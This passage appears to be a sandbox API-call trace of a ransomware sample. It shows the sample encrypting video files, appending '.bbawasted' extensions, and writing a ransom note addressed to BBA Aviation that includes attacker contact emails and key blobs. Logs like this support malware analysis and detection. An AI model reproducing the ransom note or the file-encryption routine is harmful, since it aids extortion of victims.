dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5e88) returned 1 [0230.287] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.287] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0230.288] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6b48) returned 1 [0230.288] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0230.288] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0230.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0230.480] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0230.481] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]oH8YDHs2VlWjt+xHEyc5CpxQ+kxRlr+QjQ0ufpP/5Eq+h64sDy4dpZIpKjmGAxOK\r\nKHdkdpQEGFxWWOEuesDIFi9esHH9petUYGqsXCIiwkkyLZmVHCfxvsNpNj4t4C2e\r\nQ5HG0I0NgZBrlZ+JroVGrb+2DkGdxknMJGiiW/8ou/JO7DGFoi9oSeRaYkWJV5Ty\r\njcONozGZp42RVhZpbtBdH53zsnwtMLDPNRdylizx4oXqTsYB1S3iJwkl3SKn/q4L\r\nUPhOiNEM122lbLY+b9wRjQ4lg40eGYtJ89POxk3PwBn0HO64ODkw4+hqEh0b7d1+\r\nyX1QCDEDusyW9Wmwdarf0Xx9CvSsYfdBCqLsTD2Ug4b3a2rzCxpUJ3H5lPJoZcr7\r\nw88WjQwN1DKs4jwemC+DhDs2kU/Cy1cXgcBTc7k8aa40/cKt0kzdkLtbrgglXMFY\r\nBN/2sLJjnTKQ3gHPGpJBV0nacCbIkagIKGo5AaBdXhYMRwgkRBpVGcNd6kBPeqrK\r\n/YaNZ9ZlQR7fvGWymH3GRzBF+ozKMzKwl9eLN1kxvTFUZC/4Y3DvQpp8mznfkRWe\r\ndIgwXuSDhJkJWR4NLXOi1/VgozfLalS2NbnyLlJ9p1ky57YNx4fUpwHN8bKrja6X\r\nLE3uxqPv9Ofpt4H920R+uSwGSi5I8NRJDi+MXhzty8j=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.481] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0230.481] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0230.481] SetEndOfFile (hFile=0x28c) returned 1 [0230.484] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0230.484] CloseHandle (hObject=0x28c) returned 1 [0230.484] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0230.484] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ba280 | out: hHeap=0x660000) returned 1 [0230.484] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a68a0) returned 1 [0230.485] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0230.485] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0230.485] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\TdPfHpzvIv6W.swf") returned 53 [0230.485] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6ae598 [0230.485] lstrcpyW (in: lpString1=0x6ae602, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.485] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0230.486] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0230.486] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0230.486] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0230.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\TdPfHpzvIv6W.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\tdpfhpzviv6w.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0230.487] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.488] SetEndOfFile (hFile=0x28c) returned 1 [0230.488] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.488] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0230.488] lstrcpyW (in: lpString1=0x6ae602, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\TdPfHpzvIv6W.swf" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\tdpfhpzviv6w.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\TdPfHpzvIv6W.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\tdpfhpzviv6w.swf.bbawasted")) returned 1 [0230.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\TdPfHpzvIv6W.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\tdpfhpzviv6w.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0230.490] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0230.490] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xfad4 [0230.490] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfad4) returned 0x5f0000 [0230.490] CloseHandle (hObject=0x294) returned 1 [0230.493] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.494] CloseHandle (hObject=0x27c) returned 1 [0230.494] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.494] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6ce0) returned 1 [0230.494] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.494] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0230.495] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5e88) returned 1 [0230.497] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0230.497] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0230.508] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0230.508] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.509] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0230.509] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]TasDyhGKf/0pb8Fnb+ZK15yMC/WmEA1c6qwndNY6Q62mrsB0ihOeN/56YwbF7Gep\r\nf+gMv4Wk+AM3e8+8GKWMWBj0QjE1jZLjzJsYcVB3LBUeATpJnXEG0HHfEUuO2S3Q\r\nLWS04vlI8EA2EQBOBIIBIAir7hLUAHQ7swUycFn9giQVgWLwpUrqRswtMwHyH7R+\r\n1AmUx4wkNy66QvXG92VPBQ9SOS1rWt2f4ZxCAUkPZHKoLTPLJq+ULEC0dCZMY4tE\r\npXmHX4mV1Co5hXF2BW7CVCO3NBvAmbmW9fYnpJkWYG3ziya1MmN8cCoXgtQwYAao\r\nYK3j5ezLFZhbp1TrfngAQgpFjV54Ezms2XfTAT/HTh+5n8DIQ26jjDPFF8SRGmvz\r\nZ43Bb5zJPpVwlvoT8vWSsnv2EaZgf8DDMFZx+ZLRwSxVpLOgkmmbwulTTLYkZDi0\r\nxxl0GqXriLcHLPobz0+aaJnDonQ7xVrZP0w4gQKeOKvA9ijqIpwjB0wCbyoNOQk+\r\nK1eH/LoTkv8hvTky2/Z8UobdzstVb2MpNrc2YQVEwNl4Av1fhoyBCIjfCEukPtpq\r\nKvTWDrVogRcG3zQ/BHT5yPfhmTR0WTJfMkZe3bjohuznkWN/si3CRMhCll6pbhB8\r\nG2r8aGM3Mf04lZ2H91MaawTUdL6KdmctCUmGiYr6KkL=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.509] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0230.509] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0230.509] SetEndOfFile (hFile=0x28c) returned 1 [0230.699] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0230.699] CloseHandle (hObject=0x28c) returned 1 [0230.700] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0230.700] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6be0 | out: hHeap=0x660000) returned 1 [0230.700] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0230.701] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0230.701] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0230.701] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\0c1u.flv") returned 55 [0230.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x278) returned 0x6c4b88 [0230.702] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.702] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5e88) returned 1 [0230.703] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.703] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0230.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\0c1u.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\0c1u.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0230.705] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.706] SetEndOfFile (hFile=0x28c) returned 1 [0230.707] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.707] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.707] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\0c1u.flv" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\0c1u.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\0c1u.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\0c1u.flv.bbawasted")) returned 1 [0230.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\0c1u.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\0c1u.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0230.708] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0230.709] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x18945 [0230.709] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18945) returned 0x5f0000 [0230.709] CloseHandle (hObject=0x294) returned 1 [0230.712] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.713] CloseHandle (hObject=0x290) returned 1 [0230.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0230.714] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a64e8) returned 1 [0230.715] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0230.715] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0230.715] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6130) returned 1 [0230.716] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0230.716] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0230.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ae598 [0230.727] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0230.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.727] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eDKIQ8aU9fcIlBzrSqTHXagqR2jzxsDAdRvrdEfIrVYBH0sluH8dm5Nceh1tyvzO\r\n9wZhkDA99dXKST54uvPa7qRO0tcXVCqUrTCEQrSHS9SjrAhGNcxwnJnFet9wtIlU\r\nQN1QMy9srg9utgY0oNx8K4sLH6SOOe7nb5/03dhykFIZuFbB4ITAW2efbw8kNTkT\r\nasIMbPiXzzhdbc9ipbsEmwBI2g3BWpGQMQWtarcnrIXbcboGAVvAMxcVYcU2os3y\r\nOL0ESu7UhN5g5FrfkUDu2lIiz1yxFb49CURsAm2J02BKiERy5CbBbg6Pq3fUAclh\r\n3SagWSAdgUPIVnM5K31RE7R5dz0o/dXwigHaNWWd9tYUyfbz65t9m8Z8RiiHpuWr\r\nMckXS6AExsazy/bRYc/r5EjW41GGcN4WCAkxrjxZYJlHnv5z3Bm8PM4/f0Zn7+JX\r\nRLdI0qKV9nwxTN5oMTZs4cF0jCw14iIWrJ+PJoiBNSps0ltAkkRV3e16GlH+O42x\r\nCCkbs3+ZMBHi9Je/RxsVn/I3qG34RRz6+iDgaLgcCTS+mIa39XY/WR9AteJZD+UQ\r\nGmctGWCJOnRDWRtLxqxNjeHD6Ri/FKCAanMZlTmb2J9BYZzwQmqQRaVbVQe6kQqB\r\nyj1zD5RHyUChuuLXk66zKM3lA1FQA9t27RcDK3pmpbZ=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.727] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0230.728] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0230.728] SetEndOfFile (hFile=0x28c) returned 1 [0230.731] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.732] CloseHandle (hObject=0x28c) returned 1 [0230.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0230.732] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7158 | out: hHeap=0x660000) returned 1 [0230.732] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6790) returned 1 [0230.733] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0230.733] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0230.733] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\jqYnjhkHuBuQCaimGeGu.swf") returned 71 [0230.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x298) returned 0x6c4b88 [0230.733] lstrcpyW (in: lpString1=0x6c4c16, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.733] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f10) returned 1 [0230.734] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.734] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0230.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\jqYnjhkHuBuQCaimGeGu.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\jqynjhkhubuqcaimgegu.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0230.735] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.736] SetEndOfFile (hFile=0x28c) returned 1 [0230.736] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.737] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.737] lstrcpyW (in: lpString1=0x6c4c16, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\jqYnjhkHuBuQCaimGeGu.swf" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\jqynjhkhubuqcaimgegu.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\jqYnjhkHuBuQCaimGeGu.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\jqynjhkhubuqcaimgegu.swf.bbawasted")) returned 1 [0230.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\jqYnjhkHuBuQCaimGeGu.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\jqynjhkhubuqcaimgegu.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0230.738] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0230.738] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xe5b5 [0230.739] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe5b5) returned 0x5f0000 [0230.739] CloseHandle (hObject=0x290) returned 1 [0230.741] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.742] CloseHandle (hObject=0x294) returned 1 [0230.742] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0230.742] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a60a8) returned 1 [0230.742] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0230.742] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0230.743] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6350) returned 1 [0230.743] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0230.743] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0231.030] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0231.030] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0231.030] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.030] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 